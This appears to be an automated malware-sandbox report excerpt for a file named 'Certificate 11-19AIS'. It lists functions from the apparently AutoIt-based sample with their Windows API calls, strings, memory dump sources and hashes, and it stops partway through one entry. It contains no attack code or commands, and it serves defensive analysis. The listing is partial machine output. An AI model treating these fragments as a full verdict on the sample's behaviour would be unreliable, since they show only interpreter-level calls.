                                                                              Function 007CB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 007CB98B
                                                                              • DeleteObject.GDI32(00000000), ref: 007CB9CD
                                                                              • DeleteObject.GDI32(00000000), ref: 007CB9D8
                                                                              • DestroyIcon.USER32(00000000), ref: 007CB9E3
                                                                              • DestroyWindow.USER32(00000000), ref: 007CB9EE
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0082D2AA
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0082D2E3
                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0082D711
                                                                                • Part of subcall function 007CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007CB759,?,00000000,?,?,?,?,007CB72B,00000000,?), ref: 007CBA58
                                                                              • SendMessageW.USER32 ref: 0082D758
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0082D76F
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0082D785
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0082D790
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 464785882-4108050209
                                                                              • Opcode ID: 48bf52a1303d0efddfb87421068d621ba5ee765c4db7038e7469f496c4a83b68
                                                                              • Instruction ID: 58c4de2897c6f241b29d737fd8e741b1785b12cda88aff5bd18b7dbffea08e6c
                                                                              • Opcode Fuzzy Hash: 48bf52a1303d0efddfb87421068d621ba5ee765c4db7038e7469f496c4a83b68
                                                                              • Instruction Fuzzy Hash: B2127770604321DFDB24DF28E889BA9BBE5FB55304F14456DF989CB262C735E882CB91
                                                                              Function 007FDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 007FDBD6
                                                                              • GetDriveTypeW.KERNEL32(?,0084DC54,?,\\.\,0084DC00), ref: 007FDCC3
                                                                              • SetErrorMode.KERNEL32(00000000,0084DC54,?,\\.\,0084DC00), ref: 007FDE29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              • Opcode ID: c7737af67fef86cfd56deb4a657fdba5d09b408fb84ac493700a488cf874e355
                                                                              • Instruction ID: 73d0b8cad3d6ac80a9dba883e86e45fa7c296d1c117a7096f75133154e51080a
                                                                              • Opcode Fuzzy Hash: c7737af67fef86cfd56deb4a657fdba5d09b408fb84ac493700a488cf874e355
                                                                              • Instruction Fuzzy Hash: DA51B33034830AEBC224EF14C8869B9B7A2FB94720B25491AF267D7395DB7CDD45D742
                                                                              Function 007BCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-86951937
                                                                              • Opcode ID: 4765f4a22f76bc9294f47cf8a8fb8c6ddb750cfa6a20ade23f7d6105075149c4
                                                                              • Instruction ID: eb02776338f650374ac0b4c95269fffda5b908678d98db312d4d0cbd350ebfc5
                                                                              • Opcode Fuzzy Hash: 4765f4a22f76bc9294f47cf8a8fb8c6ddb750cfa6a20ade23f7d6105075149c4
                                                                              • Instruction Fuzzy Hash: 2081D874740219FBDB26AA64DC56FEF3779FF24310F048029F905EB282EB68D941D2A1
                                                                              Function 0081C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0081C788
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0081C83E
                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0081C859
                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0081CB15
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: 0
                                                                              • API String ID: 2326795674-4108050209
                                                                              • Opcode ID: c0ab5f5a0418df5edad2f0b4a66882c1f95d0c44f4313fff483926e986767ec8
                                                                              • Instruction ID: 6d97bded59f215a30844bb5a8fad446c78e017d12a1cf492487c62b84a950839
                                                                              • Opcode Fuzzy Hash: c0ab5f5a0418df5edad2f0b4a66882c1f95d0c44f4313fff483926e986767ec8
                                                                              • Instruction Fuzzy Hash: B2F1E5B1188305AFD7218F28C88ABEABBE8FF45754F04092DF599D62A1D774CC80CB91
                                                                              Function 0081638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,0084DC00), ref: 00816449
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                              • API String ID: 3964851224-45149045
                                                                              • Opcode ID: 641cf185c167a4dc2b9e08e80b4f4fe9d423593ffabf44ba05b820360c0bca6b
                                                                              • Instruction ID: e708c8353150a4186d4ea1d7e6568fa15feb08c5c2b29b3c03fb4c93bee8e48c
                                                                              • Opcode Fuzzy Hash: 641cf185c167a4dc2b9e08e80b4f4fe9d423593ffabf44ba05b820360c0bca6b
                                                                              • Instruction Fuzzy Hash: 97C18030204249CBCB14EF10C555AEE77A9FF95348F04486CF996DB2D2EB24ED9ACB91
                                                                              Function 0081D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 0081D5AE
                                                                              • SetTextColor.GDI32(?,?), ref: 0081D5B2
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0081D5C8
                                                                              • GetSysColor.USER32(0000000F), ref: 0081D5D3
                                                                              • CreateSolidBrush.GDI32(?), ref: 0081D5D8
                                                                              • GetSysColor.USER32(00000011), ref: 0081D5F0
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0081D5FE
                                                                              • SelectObject.GDI32(?,00000000), ref: 0081D60F
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0081D618
                                                                              • SelectObject.GDI32(?,?), ref: 0081D625
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0081D644
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0081D65B
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0081D670
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0081D698
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0081D6BF
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0081D6DD
                                                                              • DrawFocusRect.USER32(?,?), ref: 0081D6E8
                                                                              • GetSysColor.USER32(00000011), ref: 0081D6F6
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0081D6FE
                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0081D712
                                                                              • SelectObject.GDI32(?,0081D2A5), ref: 0081D729
                                                                              • DeleteObject.GDI32(?), ref: 0081D734
                                                                              • SelectObject.GDI32(?,?), ref: 0081D73A
                                                                              • DeleteObject.GDI32(?), ref: 0081D73F
                                                                              • SetTextColor.GDI32(?,?), ref: 0081D745
                                                                              • SetBkColor.GDI32(?,?), ref: 0081D74F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              • Opcode ID: cef3123dfa28da93bd202982e4114f1cb84fce404e178d1684f25caec191239d
                                                                              • Instruction ID: f138fbafd23f66cf017265de2230858a30051e44962c2df9b689ebff997d45be
                                                                              • Opcode Fuzzy Hash: cef3123dfa28da93bd202982e4114f1cb84fce404e178d1684f25caec191239d
                                                                              • Instruction Fuzzy Hash: 25511B72900218EFDF109FA4EC48EEEBB7AFF48324F104915F915AB2A1D7759A40DB90
                                                                              Function 0081B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0081B7B0
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0081B7C1
                                                                              • CharNextW.USER32(0000014E), ref: 0081B7F0
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0081B831
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0081B847
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0081B858
                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0081B875
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0081B8C7
                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0081B8DD
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0081B90E
                                                                              • _memset.LIBCMT ref: 0081B933
                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0081B97C
                                                                              • _memset.LIBCMT ref: 0081B9DB
                                                                              • SendMessageW.USER32 ref: 0081BA05
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0081BA5D
                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0081BB0A
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0081BB2C
                                                                              • GetMenuItemInfoW.USER32(?), ref: 0081BB76
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0081BBA3
                                                                              • DrawMenuBar.USER32(?), ref: 0081BBB2
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0081BBDA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                              • String ID: 0
                                                                              • API String ID: 1073566785-4108050209
                                                                              • Opcode ID: f60fc3cea6a5beabea0fb0c14553b467d6744300101d357c57f3440b7f9e0d6d
                                                                              • Instruction ID: 8e42d5431187985d6f695c4362fc90a65c208862dabceca1cce8cb3766759941
                                                                              • Opcode Fuzzy Hash: f60fc3cea6a5beabea0fb0c14553b467d6744300101d357c57f3440b7f9e0d6d
                                                                              • Instruction Fuzzy Hash: F0E19F71900218ABDF209F65DC89EEE7B7CFF15724F14815AF929EA290D7748A81CF60
                                                                              Function 0081764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 0081778A
                                                                              • GetDesktopWindow.USER32 ref: 0081779F
                                                                              • GetWindowRect.USER32(00000000), ref: 008177A6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00817808
                                                                              • DestroyWindow.USER32(?), ref: 00817834
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0081785D
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081787B
                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008178A1
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 008178B6
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008178C9
                                                                              • IsWindowVisible.USER32(?), ref: 008178E9
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00817904
                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00817918
                                                                              • GetWindowRect.USER32(?,?), ref: 00817930
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00817956
                                                                              • GetMonitorInfoW.USER32 ref: 00817970
                                                                              • CopyRect.USER32(?,?), ref: 00817987
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 008179F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              • Opcode ID: 792c06d33d038e2b935b752a937a1923d89b0123e17795bd6b5e0091cd8763eb
                                                                              • Instruction ID: e561a10e6394bf242e9f0fcfd556f07532fb856b2a0e37e6f8cf7d960321b225
                                                                              • Opcode Fuzzy Hash: 792c06d33d038e2b935b752a937a1923d89b0123e17795bd6b5e0091cd8763eb
                                                                              • Instruction Fuzzy Hash: B8B17B71608340AFDB04DF64C949BAABBE9FF88310F00891DF599DB291DB74E844CB96
                                                                              Function 007F6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007F6CFB
                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007F6D21
                                                                              • _wcscpy.LIBCMT ref: 007F6D4F
                                                                              • _wcscmp.LIBCMT ref: 007F6D5A
                                                                              • _wcscat.LIBCMT ref: 007F6D70
                                                                              • _wcsstr.LIBCMT ref: 007F6D7B
                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007F6D97
                                                                              • _wcscat.LIBCMT ref: 007F6DE0
                                                                              • _wcscat.LIBCMT ref: 007F6DE7
                                                                              • _wcsncpy.LIBCMT ref: 007F6E12
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                              • API String ID: 699586101-1459072770
                                                                              • Opcode ID: 9540ee6fd818ba0466342d0261f01540b29a78a5cc9f775900b23d2fa2da23fc
                                                                              • Instruction ID: 6532ee4aa94d00310b10b136fab0b41a04a82445617872e5140576778bfddb60
                                                                              • Opcode Fuzzy Hash: 9540ee6fd818ba0466342d0261f01540b29a78a5cc9f775900b23d2fa2da23fc
                                                                              • Instruction Fuzzy Hash: 8A41A672600214BBEB04AB64DD4BEBF777CEF51710F14006AFA15E6382EA7C9A1196A1
                                                                              Function 007CA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007CA939
                                                                              • GetSystemMetrics.USER32(00000007), ref: 007CA941
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007CA96C
                                                                              • GetSystemMetrics.USER32(00000008), ref: 007CA974
                                                                              • GetSystemMetrics.USER32(00000004), ref: 007CA999
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007CA9B6
                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 007CA9C6
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007CA9F9
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007CAA0D
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 007CAA2B
                                                                              • GetStockObject.GDI32(00000011), ref: 007CAA47
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 007CAA52
                                                                                • Part of subcall function 007CB63C: GetCursorPos.USER32(000000FF), ref: 007CB64F
                                                                                • Part of subcall function 007CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
                                                                                • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000001), ref: 007CB691
                                                                                • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000002), ref: 007CB69F
                                                                              • SetTimer.USER32(00000000,00000000,00000028,007CAB87), ref: 007CAA79
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: a7283d4c2b4a0ee08d0fcc1331a2cdc594e8583d76811ea616afe31c491d7d54
                                                                              • Instruction ID: 528211571afae04b89c6165ff593b8f1a9e13f76589a90f1d60a1bdd1cfd34cb
                                                                              • Opcode Fuzzy Hash: a7283d4c2b4a0ee08d0fcc1331a2cdc594e8583d76811ea616afe31c491d7d54
                                                                              • Instruction Fuzzy Hash: 92B15A71A0021AAFDF14DFA8DC4AFAE7BB4FB58315F114219FA15E6290DB34E881CB51
                                                                              Function 007B2EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Foreground
                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                              • API String ID: 62970417-1919597938
                                                                              • Opcode ID: 0ff4d051552513a16b50fc540adcad35265f786bcbd7f6f64ed8c0230514ef2b
                                                                              • Instruction ID: 96286c465dd0cc595f4ebc9f8c8207a5d3fb6e04c048104d30947243a4372b95
                                                                              • Opcode Fuzzy Hash: 0ff4d051552513a16b50fc540adcad35265f786bcbd7f6f64ed8c0230514ef2b
                                                                              • Instruction Fuzzy Hash: D6D1E430104746EBCB14EF60D885AAAFBB0FF54344F004A1DF456D72A2DB78E99ACB91
                                                                              Function 00813639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00813735
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0084DC00,00000000,?,00000000,?,?), ref: 008137A3
                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008137EB
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00813874
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00813B94
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00813BA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectCreateRegistryValue
